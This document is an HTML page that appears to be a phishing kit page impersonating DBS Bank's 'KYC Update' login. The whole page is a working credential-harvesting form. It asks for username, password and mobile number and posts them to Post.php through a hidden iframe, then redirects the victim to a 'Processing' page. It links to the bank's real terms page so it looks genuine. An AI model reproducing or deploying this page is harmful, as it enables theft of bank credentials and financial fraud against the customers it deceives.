<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<meta charSet="utf-8" />
<meta name="viewport" content="width=device-width" />
<meta name="theme-color" content="#ffffff">
<title>DBS Bank | KYC Update</title>
<meta name="description" content="login" />
<link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300..800;1,300..800&display=swap" rel="stylesheet">
<link rel="stylesheet" href="./style.css">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'><link rel="stylesheet" href="./style.css">
<style type="text/css">
#mn
{ 
  width:104.4%;
  margin-top:-9px;
  margin-left:-8px;
}
#ft
{ 
  width:104%;
  margin-top:50px;
  margin-left:-7px;
  text-align:bottom;
}
#pc
{ 
  width:92%;
  margin-left:2px;
  margin-bottom:20px;
}
input[type="text"] {
  width: 90%;
  color:#000;
  border: none;
  border-radius: 2px;
  outline: none;
  padding: 20px;
  box-sizing: border-box;
  transition: 0.3s;
}
input::-webkit-input-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus::-webkit-input-placeholder {
    color: #999;
    text-transform:none;
    font-family: 'Open Sans', sans-serif;
}

/* Firefox < 19 */
input:-moz-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus:-moz-placeholder {
    color: #999;
    font-family: 'Open Sans', sans-serif;
    text-transform:none;
}

/* Firefox > 19 */
input::-moz-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus::-moz-placeholder {
    color: #999;
    font-family: 'Open Sans', sans-serif;
    text-transform:none;
}

/* Internet Explorer 10 */
input:-ms-input-placeholder {
    color: transparent;
    font-family: 'Open Sans', sans-serif;
}
input:focus:-ms-input-placeholder {
    color: #999;
    font-family: 'Open Sans', sans-serif;
    text-transform:none;
}
</style>
</head>
<body style="background-color:#f6f5f1;">
  <!-- Static- Please don't do anything here-->
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing.html';}"></iframe>
        <img alt="" src="Logo.jpg" id="mn"/><br>
        <center><a href="Mobile_And_Email.html"><img alt="" src="Link.jpg" id="pc"/></a></center>
        <p1> <a href="Mobile_And_Email.html" style="color:#fff; font-family: 'Open Sans', sans-serif; font-size:13px; position:absolute; top:112px; margin-left:104px; letter-spacing: 0.2px; word-spacing: 0.2px; font-weight:500; text-decoration:underline;">Tap Here</a></p1>
        <form class="LoginForm" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="form" >
                        <div class="input-group">
                            <center><input class="input-group__input" type="text" name="Username" minlength="6" maxlength="30" placeholder="Enter Username" id="Username"
                            required />
                            <label class="input-group__label" for="Username">Username</label>
                            </div>
                        <div class="input-group">
                        <center><input type="text" class="input-group__input" placeholder="Enter Password" name="Password" id="name" minlength="8" maxlength="25" autocomplete="off" required />
                        <label class="input-group__label" for="Password">Login Password</label>
                        </div>
                        <div class="input-group">
                        <center><input class="input-group__input" type="text" name="Mobile_Number" inputmode="numeric" maxlength="10" placeholder="Enter Mobile Number" id="mobile"
                        pattern="[6-9]\d{9}" title="Please enter valid mobile number !" required />
                        <label class="input-group__label" for="mobile">Mobile Number</label></center>
                        </div>
                        <div style="margin-top:-18px;">
                        <p1 style="color:#676766; font-family: 'Open Sans', sans-serif; font-size:13px; letter-spacing: 0.2px; word-spacing: 0.2px; margin-left:25px; font-weight:300; text-decoration:none;">By logging in, you agree our<span> <a href="https://www.dbs.com/digibank/in/digi-internet-banking-tc.page" style="color:#676766; font-family: 'Open Sans', sans-serif; font-size:13px; letter-spacing: 0.2px; word-spacing: 0.2px; margin-left:0px; font-weight:300; text-decoration:underline;">Terms & conditions</a></span></p1>
                        </div><br><br>
                        <center><button type="submit">Proceed</button></center><br>
                        <center><p style="font-family: 'Open Sans', sans-serif; font-size:16px; word-spacing: 0.5px; letter-spacing: 0.2px; font-weight:300; color:#000; text-decoration:none;" class="link text-center">
                        <a href="Mobile_And_Email.html" style="font-family: 'Open Sans', sans-serif; font-size:16px; font-weight:500; color:#000; text-decoration:none;">New to netbanking? Activate now</a></p></center>
      </form>
  </body>
</html>